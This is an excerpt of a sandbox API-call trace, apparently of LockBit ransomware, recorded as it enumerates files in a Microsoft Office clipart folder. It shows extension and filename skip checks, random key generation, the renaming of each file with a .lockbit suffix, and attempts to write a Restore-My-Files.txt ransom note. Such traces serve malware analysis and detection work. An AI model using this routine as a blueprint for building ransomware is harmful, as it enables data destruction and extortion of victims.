(lpString1=".idx", lpString2=".WMF") returned -1 [0150.223] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.223] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.223] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.223] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.223] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.223] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.223] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0196110.WMF") returned 1 [0150.223] lstrcmpiW (lpString1="ntldr", lpString2="J0196110.WMF") returned 1 [0150.223] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0196110.WMF") returned 1 [0150.223] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0196110.WMF") returned -1 [0150.223] lstrcmpiW (lpString1="autorun.inf", lpString2="J0196110.WMF") returned -1 [0150.223] lstrcmpiW (lpString1="thumbs.db", lpString2="J0196110.WMF") returned 1 [0150.223] lstrcmpiW (lpString1="iconcache.db", lpString2="J0196110.WMF") returned -1 [0150.223] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.223] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196110.WMF") returned=".WMF" [0150.223] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.225] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.225] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.226] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.226] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.226] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.226] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.226] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.226] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.226] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.226] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.226] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196110.WMF.lockbit") returned 72 [0150.226] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196110.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196110.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0150.231] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.231] malloc (_Size=0x40068) returned 0x3d70450 [0150.231] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=5326) returned 1 [0150.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0150.232] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0150.232] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0150.235] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196110.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196110.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.235] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.235] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.237] free (_Block=0x1fa2ed8) [0150.237] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196110.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.237] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.237] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.237] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xef2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0196142.WMF", cAlternateFileName="")) returned 1 [0150.237] lstrcmpiW (lpString1=".", lpString2="J0196142.WMF") returned -1 [0150.237] lstrcmpiW (lpString1="..", lpString2="J0196142.WMF") returned -1 [0150.237] PathFindExtensionW (pszPath="J0196142.WMF") returned=".WMF" [0150.237] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.237] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.237] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.237] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.237] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.237] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.237] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.237] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.237] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.238] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.238] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.239] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0196142.WMF") returned 1 [0150.239] lstrcmpiW (lpString1="ntldr", lpString2="J0196142.WMF") returned 1 [0150.239] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0196142.WMF") returned 1 [0150.239] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0196142.WMF") returned -1 [0150.239] lstrcmpiW (lpString1="autorun.inf", lpString2="J0196142.WMF") returned -1 [0150.240] lstrcmpiW (lpString1="thumbs.db", lpString2="J0196142.WMF") returned 1 [0150.240] lstrcmpiW (lpString1="iconcache.db", lpString2="J0196142.WMF") returned -1 [0150.240] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.240] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196142.WMF") returned=".WMF" [0150.240] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.240] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.240] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.241] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.241] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.241] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.241] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.241] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.241] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.241] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.241] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.241] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.241] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.241] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.241] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.241] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196142.WMF.lockbit") returned 72 [0150.241] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196142.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196142.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.242] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.242] malloc (_Size=0x40068) returned 0x3e70008 [0150.242] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=3826) returned 1 [0150.242] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.243] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0150.243] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0150.244] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0150.249] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196142.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196142.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.249] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.249] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.250] free (_Block=0x1fa2ed8) [0150.250] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196142.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.250] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.250] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.250] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x739e4f00, ftCreationTime.dwHighDateTime=0x1be390f, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x739e4f00, ftLastWriteTime.dwHighDateTime=0x1be390f, nFileSizeHigh=0x0, nFileSizeLow=0x3586, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0196354.WMF", cAlternateFileName="")) returned 1 [0150.250] lstrcmpiW (lpString1=".", lpString2="J0196354.WMF") returned -1 [0150.250] lstrcmpiW (lpString1="..", lpString2="J0196354.WMF") returned -1 [0150.250] PathFindExtensionW (pszPath="J0196354.WMF") returned=".WMF" [0150.251] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.251] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.252] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.252] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.253] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.253] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.253] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.253] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.253] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.253] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.253] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.253] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.253] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.253] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.253] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.253] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0196354.WMF") returned 1 [0150.253] lstrcmpiW (lpString1="ntldr", lpString2="J0196354.WMF") returned 1 [0150.253] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0196354.WMF") returned 1 [0150.253] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0196354.WMF") returned -1 [0150.253] lstrcmpiW (lpString1="autorun.inf", lpString2="J0196354.WMF") returned -1 [0150.253] lstrcmpiW (lpString1="thumbs.db", lpString2="J0196354.WMF") returned 1 [0150.253] lstrcmpiW (lpString1="iconcache.db", lpString2="J0196354.WMF") returned -1 [0150.253] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.253] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196354.WMF") returned=".WMF" [0150.254] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.254] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.254] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.255] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.255] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.255] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.255] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.255] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.255] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.255] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.255] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.255] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196354.WMF.lockbit") returned 72 [0150.255] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196354.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196354.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0150.256] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.256] malloc (_Size=0x40068) returned 0x3df0008 [0150.256] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13702) returned 1 [0150.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.257] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.257] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.258] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.258] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.263] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196354.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196354.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.263] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.263] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.264] free (_Block=0x1fa2ed8) [0150.264] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196354.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.265] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), 